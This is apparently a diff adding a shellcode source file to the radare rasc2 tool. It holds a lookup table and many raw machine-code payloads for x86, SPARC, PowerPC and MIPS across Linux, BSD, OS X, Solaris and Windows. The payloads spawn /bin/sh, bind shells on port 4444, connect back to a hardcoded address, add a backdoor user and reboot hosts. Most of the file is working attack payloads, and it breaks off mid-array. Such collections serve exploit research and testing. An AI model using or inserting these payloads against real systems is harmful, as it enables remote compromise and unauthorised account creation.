ENTRY(0,0,0,"ppc.osx.bind4444", ppc_osx_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"ppc.osx.reboot", ppc_osx_reboot, "Reboots the box" )
ENTRY(0,0,0,"ppc.bsd.binsh", ppc_bsd_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"sparc.linux.binsh", sparc_linux_binsh, "Runs /bin/sh on sparc/linux" )
ENTRY(0,0,0,"sparc.linux.bind4444", sparc_linux_bind4444, "Binds a shell at TCP port 4444" )
ENTRY(0,0,0,"sparc.linux.binsh2", sparc_linux_javicoder_binsh, "Runs /bin/sh on sparc/linux (coder)" )
ENTRY(0,0,0,"sparc.linux.bind1124", sparc_linux_javicoder_portbind, "Listen shell at 1124" )
ENTRY(0,0,0,"sparc.linux.connect", sparc_linux_javicoder_connect, "Connects to 10.12.34.3 : 1124")
//ENTRY(0,0,0,"ia64.linux.binsh", ia64_linux_binsh, "Executes /bin/sh on Intel Itanium" )
ENTRY(0,0,0,"x64.linux.binsh", x64_linux_binsh, "Runs /bin/sh on 64 bits" )
ENTRY(0,0,0,"x64.osx.suidsh", x64_osx_suidsh, "Setuid(0) and runs /bin/sh")
ENTRY(0,43,39,"x64.osx.reverse", x64_osx_reverse_tcp, "OSX reverse connect shell")
ENTRY(0,0,0,"x86.bsd.binsh", x86_bsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.bsd.binsh2", x86_bsd_binsh2, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.bsd.suidsh", x86_bsd_suidsh, "Setuid(0) and runs /bin/sh" )
ENTRY(0,0,0,"x86.bsd.bind4444", x86_bsd_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.bsdlinux.binsh", x86_bsdlinux_binsh, "Dual linux/bsd shellcode runs /bin/sh" )
ENTRY(0,0,0,"x86.freebsd.reboot", x86_freebsd_reboot, "Reboots target box" )
ENTRY(0,0,0,"x86.freebsd.reverse", x86_freebsd_reverse, "Reboots target box" )
ENTRY(0,0,0,"x86.linux.adduser", x86_linux_adduser, "Adds user 'x' with password 'y'" )
ENTRY(0,0,0,"x86.linux.bind4444", x86_linux_bind4444, "Binds a shell at TCP port 4444" )
ENTRY(0,0,0,"x86.linux.binsh", x86_linux_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.linux.binsh1", x86_linux_binsh1, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.linux.binsh2", x86_linux_binsh2, "Executes /bin/sh" )
ENTRY(43,0,0,"x86.linux.binsh3", x86_linux_binsh3, "Executes /bin/sh or CMD" )
ENTRY(0,0,0,"x86.linux.udp4444", x86_linux_udp4444, "Binds a shell at UDP port 4444" )
ENTRY(0,0,0,"x86.netbsd.binsh", x86_netbsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.openbsd.binsh", x86_openbsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.openbsd.bind6969", x86_openbsd_bind6969, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.binsh", x86_osx_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.binsh2", x86_osx_binsh2, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.bind4444", x86_osx_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.solaris.binsh", x86_solaris_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"x86.solaris.binshu", x86_solaris_binshu, "Runs /bin/sh (toupper() safe)" )
ENTRY(0,0,0,"x86.solaris.bind4444", x86_solaris_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.w32.msg", x86_w32_msg, "Shows a MessageBox" )
ENTRY(0,0,0,"x86.w32.cmd", x86_w32_cmd_exit, "Runs cmd.exe and ExitThread" )
ENTRY(0,0,0,"x86.w32.adduser", x86_w32_adduser, "Adds user 'x' with password 'y'" )
ENTRY(0,0,0,"x86.w32.bind4444", x86_w32_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.w32.tcp4444", x86_w32_tcp4444, "Binds a shell at port 4444" )
ENTRY_NULL()
};
#if 0
main()
{
void (*punk)() = &x86_linux_binsh;
punk();
printf("%s\n", shellcodes[0].desc);
}
#endif

936
binr/rasc2/shellcodes.c.src Normal file
View File

@ -0,0 +1,936 @@
/*
* Copyright (C) 2007-2011
* pancake <nopcode.org>
*
* radare is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* radare is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with radare; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
// XXX: shellcodes are ended with '\0'. so they should not contain any '\0'
#include <stdio.h>
#include "rasc.h"
// moar at:
// http://www.groar.org/expl/openbsd/english.shtml
#if SELFSTOP
#define RET 0x80494c0
// 1) buscar jmp de 5 bytes
#define INJECT jmp $delta-$here-10
linux_selfsigstop:
push RET
/* 68 34 de 04 08 */
pusha
mov $20, %eax
int $0x80
mov %eax, %ebx /* pid */
mov $19, %ecx /* stop */
mov $37, %eax /* kill */
int $0x80
popa
ret
freebsd_selfsigstop:
push RET_ADDR
pusha
mov $20, %eax
push %ebp
int $0x80
pop %ebp
push $17
push %eax
mov $37, %eax
push %ebp
int $0x80
pop %ebp
pop %ebp
pop %ebp
popa
ret
#endif
#if 0
// dump warns and it has not been tested.. out!
/* from phrack57 */
unsigned long long ia64_linux_binsh[] = {
/* MLX
* alloc r34 = ar.pfs, 0, 3, 3, 0 // allocate vars for syscall
* movl r14 = 0x0168732f6e69622f // aka "/bin/sh",0x01
* ;; */
0x2f6e458006191005,
0x631132f1c0016873,
/* MLX
* xor r37 = r37, r37 // NULL
* movl r17 = 0x48f017994897c001 // bundle[0]
* ;; */
0x9948a00f4a952805,
0x6602e0122048f017,
/* MII
* adds r15 = 0x1094, r37 // unfinished bundle[1]
* or r22 = 0x08, r37 // part 1 of bundle[1]
* dep r12 = r37, r12, 0, 8 // align stack ptr
* ;; */
0x416021214a507801,
0x4fdc625180405c94,
/* MII
* adds r35 = -40, r12 // circling mem addr 1, shellstr addr
* adds r36 = -32, r12 // circling mem addr 2, args[0] addr
* dep r15 = r22, r15, 56, 8 // patch bundle[1] (part 1)
* ;; */
0x0240233f19611801,
0x41dc7961e0467e33,
/* MII
* st8 [r36] = r35, 16 // args[0] = shellstring addr
* adds r19 = -16, r12 // prepare branch addr: bundle[0] addr
* or r23 = 0x42, r37 // part 2 of bundle[1]
* ;; */
0x81301598488c8001,
0x80b92c22e0467e33,
/* MII
* st8 [r36] = r17, 8 // store bundle[0]
* dep r14 = r37, r14, 56, 8 // fix shellstring
* dep r15 = r23, r15, 16, 8 // patch bundle[1] (part 2)
* ;; */
0x28e0159848444001,
0x4bdc7971e020ee39,
/* MMI
* st8 [r35] = r14, 25 // store shellstring
* cmp.eq p2, p8 = r37, r37 // prepare predicate for final branch.
* mov b6 = r19 // (+0x01) setup branch reg
* ;; */
0x282015984638c801,
0x07010930c0701095,
/* MIB
* st8 [r36] = r15, -16 // store bundle[1]
* adds r35 = -25, r35 // correct string addr
* (p2) br.cond.spnt.few b6 // (+0x01) branch to constr. bundle
* ;; */
0x3a301799483f8011,
0x0180016001467e8f,
};
#endif
unsigned char nopcode_carver[] =
"\x61\x66\x3d\x90\x90\x75\xf9\x54\xc3";
unsigned char x86_linux_binsh[] =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
unsigned char x86_linux_binsh1[] = // -( nemo )-
"\xeb\x10\x5b\x31\xc0\x50\x53\xb0\x0b\x88\x63\x07\x89\xe1\x31\xd2\xcd\x80\xe8\xeb\xff\xff\xff/bin/shX";
/* 0xcafebabe.it */
unsigned char x86_linux_binsh2[] =
"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int mips_linux_binsh[] = {
0x00842026, 0x24020fb7, 0x0000000c, 0x3c086e69, 0x3508622f, 0x3c090068,
0x3529732f, 0xafa80000, 0xafa90004, 0xafbd0008, 0xafa0000c, 0x03a02021,
0x23a50008, 0x00003021, 0x24020fab, 0x0000000c, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000 };
char sparc_linux_binsh[]=
"\x9d\xe3\xbf\x80" // save %sp, -128, %sp
"\x90\x10\x20\x02" // mov 2, %o0
"\xd0\x37\xbf\xe0" // sth %o0, [ %fp + -32 ]
"\x90\x10\x29\x09" // mov 0x909, %o0
"\xd0\x37\xbf\xe2" // sth %o0, [ %fp + -30 ]
"\x13\x30\x2a\x19" // sethi %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
"\x90\x12\x60\x01" // or %o1, 1, %o0 <- ALSO THIS.
"\xd0\x27\xbf\xe4" // st %o0, [ %fp + -28 ]
"\x90\x10\x20\x02" // mov 2, %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x94\x22\x60\x01" // sub %o1, 1, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x01" // mov 1, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x27\xbf\xf4" // st %o0, [ %fp + -12 ]
"\x92\x07\xbf\xe0" // add %fp, -32, %o1
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x94\x10\x20\x10" // mov 0x10, %o2
"\xd0\x23\xa0\x44" // st %o0, [ %sp + 0x44 ]
"\xd2\x23\xa0\x48" // st %o1, [ %sp + 0x48 ]
"\xd4\x23\xa0\x4c" // st %o2, [ %sp + 0x4c ]
"\x90\x10\x20\x03" // mov 3, %o0
"\x92\x03\xa0\x44" // add %sp, 0x44, %o1
"\x82\x10\x20\xce" // mov 0xce, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x1a\x40\x09" // xor %o1, %o1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x01" // mov 1, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\xd0\x07\xbf\xf4" // ld [ %fp + -12 ], %o0
"\x92\x10\x20\x02" // mov 2, %o1
"\x82\x10\x20\x5a" // mov 0x5a, %g1
"\x91\xd0\x20\x10" // ta 0x10
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l6
"\xac\x15\xa1\x6e" // or %l6, 0x16e, %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\xa6\x10\x20\x01" // mov 1, %l3
"\x94\x24\xe0\x01" // sub %l3, 1, %o2
"\x9c\x03\xa0\x10" // add %sp, 0x10, %sp
"\xec\x3b\xbf\xf0" // std %l6, [ %sp + -16 ]
"\xd0\x23\xbf\xf8" // st %o0, [ %sp + -8 ]
"\xc0\x23\xbf\xfc" // clr [ %sp + -4 ]
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x10";
/* javicoder shellcodes
--------------------- beerware license
http://www.48bits.com/papers/sparc_shellcodes.txt
*/
char sparc_linux_javicoder_binsh[] =
"\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b"
"\xdc\xda\x90\x0b\x80\x0e\x82\x10\x20\x0b"
"\x91\xd0\x20\x10\x82\x10\x20\x01\x90\x1a"
"\x40\x09\x91\xd0\x20\x10";
/* listen shell at port 1124 */
char sparc_linux_javicoder_portbind[] =
"\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46\xe4\x25"
"\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46\x84\x12\x22\xd0"
"\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea\x92\x12\x26\x66\xd2\x39"
"\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe\xa4\x09\xc1\xea\x96\x12\x22\x12"
"\xd2\x25\xa2\x46\xe4\x25\xa2\x4a\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2"
"\x22\x12\xa4\x12\x22\x03\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe"
"\xd6\x25\xa2\x4e\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29"
"\xc1\xfa\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
"\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80\x93\xd2"
"\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc\x92\x0d\x82\x10"
"\x84\x12\x22\x0d\x93\xd2\x22\x12";
#if 0
( .. 11 instructions .. ) (+44 bytes+deobfusacte+nops)
mov 0x464, %l1 ! puerto 1124
sethi %hi(0x0a0c2203), %l2 !
or %l2, %lo(0x0a0c2203), %l2 ! direcci?n IP 10.12.34.3
#endif
char sparc_linux_javicoder_connect[] =
/* rutina desofuscadora */
"\x10\x80\x00\x0c\xa4\x1c\x80\x12\xa2\x03\xe0\x08\xe8\x0c\x40\x05"
"\xa4\x04\xa0\x01\xa8\x25\x20\x02\xe8\x2c\x40\x05\x80\xa4\xa0\xc4"
"\x04\xbf\xff\xfb\xa2\x04\x60\x01\x8b\xc3\xe0\x08\xa4\x1c\x80\x12"
"\x7f\xff\xff\xf6\x8a\x19\x40\x05"
/*
* NOPs por la i-cache
*/
"\x03\x02\x02\x02\x03\x02\x02\x02"
/*
* shellcode ofuscada
*/
"\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46"
"\xe4\x25\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46"
"\x84\x12\x22\xd0\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea"
"\x92\x12\x26\x66\xd2\x39\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe"
"\xa4\x09\xc1\xea\x96\x12\x22\x12\xd2\x25\xa2\x46\xe4\x25\xa2\x4a"
"\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2\x22\x12\xa4\x12\x22\x03"
"\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe\xd6\x25\xa2\x4e"
"\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29\xc1\xfa"
"\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
"\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80"
"\x93\xd2\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc"
"\x92\x0d\x82\x10\x84\x12\x22\x0d\x93\xd2\x22\x12";
unsigned char x86_linux_bind4444[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x81\x9c\x95"
"\xe9\x83\xeb\xfc\xe2\xf4\xb0\x47\xc6\xaa\xd2\xf6\x97\x83\xe7\xc4\x0c\x60"
"\x60\x51\x15\x7f\xc2\xce\xf3\x81\x90\xc0\xf3\xba\x08\x7d\xff\x8f\xd9\xcc"
"\xc4\xbf\x08\x7d\x58\x69\x31\xfa\x44\x0a\x4c\x1c\xc7\xbb\xd7\xdf\x1c\x08"
"\x31\xfa\x58\x69\x12\xf6\x97\xb0\x31\xa3\x58\x69\xc8\xe5\x6c\x59\x8a\xce"
"\xfd\xc6\xae\xef\xfd\x81\xae\xfe\xfc\x87\x08\x7f\xc7\xba\x08\x7d\x58\x69\x00";
unsigned char x86_linux_udp4444[] =
"\x33\xc9\x83\xe9\xe7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13\xec\x81"
"\xca\x83\xeb\xfc\xe2\xf4\x22\x37\xd2\xa0\x11\x86\x83\x89\x79\x8a\xd9\x43"
"\xf2\x21\x01\x59\x4a\x5c\xbe\x07\x93\xa5\xf8\x33\x48\xb6\xe9\xb5\x13\xec"
"\x80\xac\x7b\xfd\xdd\xac\x40\x65\x60\xa0\x03\xbd\xd2\x43\xf2\xaf\x31\xac"
"\xde\x6c\xeb\xc1\x4b\xbe\xe7\xa2\x3e\x85\x08\x2b\x79\x8b\xe7\xa2\x7a\x82"
"\xe9\xaf\x77\x85\xf5\xa2\x3e\xc1\xef\xa5\x9a\x0b\xd3\xa2\x3c\xc3\xf2\xa2"
"\x7b\xc3\xe3\xa3\x7d\x65\x62\x98\x42\xbb\xd2\x43\xf2\x21\x01\xca\x00";
unsigned char x86_linux_adduser[] =
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73"
"\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd"
"\x80\x93\xe8\x1f\x00\x00\x00\x78\x3a\x41\x7a\x37\x44\x71\x55\x7a\x47\x6a"
"\x77\x69\x4d\x77\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73"
"\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80";
unsigned char x86_bsd_binsh[] =
"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51"
"\xcd\x80\x49\x79\xf5\x6a\x3b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x54\x53\x53\xcd\x80";
unsigned char x86_bsd_binsh2[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53"
"\x50\xb0\x3b\xcd\x80";
unsigned char x86_bsd_bind4444[] =
"\x31\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
"\xd3\x61\x53\x83\xeb\xfc\xe2\xf4\xa4\xb2\x39\xca\x9c\xbb\x71\x51"
"\xdf\x8f\xe8\xb2\x9c\x91\x33\x11\x9c\xb9\x71\x9e\x4e\x4a\xf2\x02"
"\x9d\x81\x0b\x3b\x96\x1e\xe1\xe3\xa4\x1e\xe1\x01\x9d\x81\xd1\x4d"
"\x03\x53\xf6\x39\xcc\x8a\x0b\x09\x96\x82\x36\x02\x03\x53\x28\x2a"
"\x3b\x83\x09\x7c\xe1\xa0\x09\x3b\xe1\xb1\x08\x3d\x47\x30\x31\x07"
"\x9d\x80\xd1\x68\x03\x53\x61\x53";
unsigned char ppc_osx_binsh[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58";
unsigned char ppc_osx_bind4444[] =
"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38"
"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02"
"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80"
"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44"
"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02"
"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82"
"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c"
"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00"
"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0"
"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00";
unsigned char x86_w32_bind4444[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9f"
"\x2a\xdf\x1b\x83\xeb\xfc\xe2\xf4\x63\x40\x34\x56\x77\xd3\x20\xe4"
"\x60\x4a\x54\x77\xbb\x0e\x54\x5e\xa3\xa1\xa3\x1e\xe7\x2b\x30\x90"
"\xd0\x32\x54\x44\xbf\x2b\x34\x52\x14\x1e\x54\x1a\x71\x1b\x1f\x82"
"\x33\xae\x1f\x6f\x98\xeb\x15\x16\x9e\xe8\x34\xef\xa4\x7e\xfb\x33"
"\xea\xcf\x54\x44\xbb\x2b\x34\x7d\x14\x26\x94\x90\xc0\x36\xde\xf0"
"\x9c\x06\x54\x92\xf3\x0e\xc3\x7a\x5c\x1b\x04\x7f\x14\x69\xef\x90"
"\xdf\x26\x54\x6b\x83\x87\x54\x5b\x97\x74\xb7\x95\xd1\x24\x33\x4b"
"\x60\xfc\xb9\x48\xf9\x42\xec\x29\xf7\x5d\xac\x29\xc0\x7e\x20\xcb"
"\xf7\xe1\x32\xe7\xa4\x7a\x20\xcd\xc0\xa3\x3a\x7d\x1e\xc7\xd7\x19"
"\xca\x40\xdd\xe4\x4f\x42\x06\x12\x6a\x87\x88\xe4\x49\x79\x8c\x48"
"\xcc\x79\x9c\x48\xdc\x79\x20\xcb\xf9\x42\xce\x47\xf9\x79\x56\xfa"
"\x0a\x42\x7b\x01\xef\xed\x88\xe4\x49\x40\xcf\x4a\xca\xd5\x0f\x73"
"\x3b\x87\xf1\xf2\xc8\xd5\x09\x48\xca\xd5\x0f\x73\x7a\x63\x59\x52"
"\xc8\xd5\x09\x4b\xcb\x7e\x8a\xe4\x4f\xb9\xb7\xfc\xe6\xec\xa6\x4c"
"\x60\xfc\x8a\xe4\x4f\x4c\xb5\x7f\xf9\x42\xbc\x76\x16\xcf\xb5\x4b"
"\xc6\x03\x13\x92\x78\x40\x9b\x92\x7d\x1b\x1f\xe8\x35\xd4\x9d\x36"
"\x61\x68\xf3\x88\x12\x50\xe7\xb0\x34\x81\xb7\x69\x61\x99\xc9\xe4"
"\xea\x6e\x20\xcd\xc4\x7d\x8d\x4a\xce\x7b\xb5\x1a\xce\x7b\x8a\x4a"
"\x60\xfa\xb7\xb6\x46\x2f\x11\x48\x60\xfc\xb5\xe4\x60\x1d\x20\xcb"
"\x14\x7d\x23\x98\x5b\x4e\x20\xcd\xcd\xd5\x0f\x73\x6f\xa0\xdb\x44"
"\xcc\xd5\x09\xe4\x4f\x2a\xdf\x1b\x00";
unsigned char x86_w32_tcp4444[] =
"\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7a"
"\xba\xcb\x13\x83\xeb\xfc\xe2\xf4\x86\xd0\x20\x5e\x92\x43\x34\xec"
"\x85\xda\x40\x7f\x5e\x9e\x40\x56\x46\x31\xb7\x16\x02\xbb\x24\x98"
"\x35\xa2\x40\x4c\x5a\xbb\x20\x5a\xf1\x8e\x40\x12\x94\x8b\x0b\x8a"
"\xd6\x3e\x0b\x67\x7d\x7b\x01\x1e\x7b\x78\x20\xe7\x41\xee\xef\x3b"
"\x0f\x5f\x40\x4c\x5e\xbb\x20\x75\xf1\xb6\x80\x98\x25\xa6\xca\xf8"
"\x79\x96\x40\x9a\x16\x9e\xd7\x72\xb9\x8b\x10\x77\xf1\xf9\xfb\x98"
"\x3a\xb6\x40\x63\x66\x17\x40\x53\x72\xe4\xa3\x9d\x34\xb4\x27\x43"
"\x85\x6c\xad\x40\x1c\xd2\xf8\x21\x12\xcd\xb8\x21\x25\xee\x34\xc3"
"\x12\x71\x26\xef\x41\xea\x34\xc5\x25\x33\x2e\x75\xfb\x57\xc3\x11"
"\x2f\xd0\xc9\xec\xaa\xd2\x12\x1a\x8f\x17\x9c\xec\xac\xe9\x98\x40"
"\x29\xf9\x98\x50\x29\x45\x1b\x7b\x7a\xba\xcb\x13\x1c\xd2\xda\x4f"
"\x1c\xe9\x42\xf2\xef\xd2\x27\xea\xd0\xda\x9c\xec\xac\xd0\xdb\x42"
"\x2f\x45\x1b\x75\x10\xde\xad\x7b\x19\xd7\xa1\x43\x23\x93\x07\x9a"
"\x9d\xd0\x8f\x9a\x98\x8b\x0b\xe0\xd0\x2f\x42\xee\x84\xf8\xe6\xed"
"\x38\x96\x46\x69\x42\x11\x60\xb8\x12\xc8\x35\xa0\x6c\x45\xbe\x3b"
"\x85\x6c\x90\x44\x28\xeb\x9a\x42\x10\xbb\x9a\x42\x2f\xeb\x34\xc3"
"\x12\x17\x12\x16\xb4\xe9\x34\xc5\x10\x45\x34\x24\x85\x6a\xa3\xf4"
"\x03\x7c\xb2\xec\x0f\xbe\x34\xc5\x85\xcd\x37\xec\xaa\xd2\x3b\x99"
"\x7e\xe5\x98\xec\xac\x45\x1b\x13";
char x86_w32_msg[]=
"\xeb"//xored with 0x1d
"\x10\x58\x31\xc9\x66\x81\xe9\x22\xff\x80\x30\x1d\x40\xe2\xfa\xeb\x05\xe8\xeb\xff"
"\xff\xff\xf4\xd1\x1d\x1d\x1d\x42\xf5\x4b\x1d\x1d\x1d\x94\xde\x4d\x75\x93\x53\x13"
"\xf1\xf5\x7d\x1d\x1d\x1d\x2c\xd4\x7b\xa4\x72\x73\x4c\x75\x68\x6f\x71\x70\x49\xe2"
"\xcd\x4d\x75\x2b\x07\x32\x6d\xf5\x5b\x1d\x1d\x1d\x2c\xd4\x4c\x4c\x90\x2a\x4b\x90"
"\x6a\x15\x4b\x4c\xe2\xcd\x4e\x75\x85\xe3\x97\x13\xf5\x30\x1d\x1d\x1d\x4c\x4a\xe2"
"\xcd\x2c\xd4\x54\xff\xe3\x4e\x75\x63\xc5\xff\x6e\xf5\x04\x1d\x1d\x1d\xe2\xcd\x48"
"\x4b\x79\xbc\x2d\x1d\x1d\x1d\x96\x5d\x11\x96\x6d\x01\xb0\x96\x75\x15\x94\xf5\x43"
"\x40\xde\x4e\x48\x4b\x4a\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1c\xf7\x96"
"\x57\x05\x96\x47\x3d\x1c\xf6\xfe\x28\x54\x96\x29\x96\x1c\xf3\x2c\xe2\xe1\x2c\xdd"
"\xb1\x25\xfd\x69\x1a\xdc\xd2\x10\x1c\xda\xf6\xef\x26\x61\x39\x09\x68\xfc\x96\x47"
"\x39\x1c\xf6\x7b\x96\x11\x56\x96\x47\x01\x1c\xf6\x96\x19\x96\x1c\xf5\xf4\x1f\x1d"
"\x1d\x1d\x2c\xdd\x94\xf7\x42\x43\x40\x46\xde\xf5\x32\xe2\xe2\xe2\x70\x75\x75\x33"
"\x78\x65\x78\x1d";
#if 0
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e";
#endif
unsigned char x86_w32_adduser[] =
"\x31\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x5e\x22\xde\x83\xeb\xfc\xe2\xf4\x14\xb6\x66\xde\xe8\x5e\xa9\x9b"
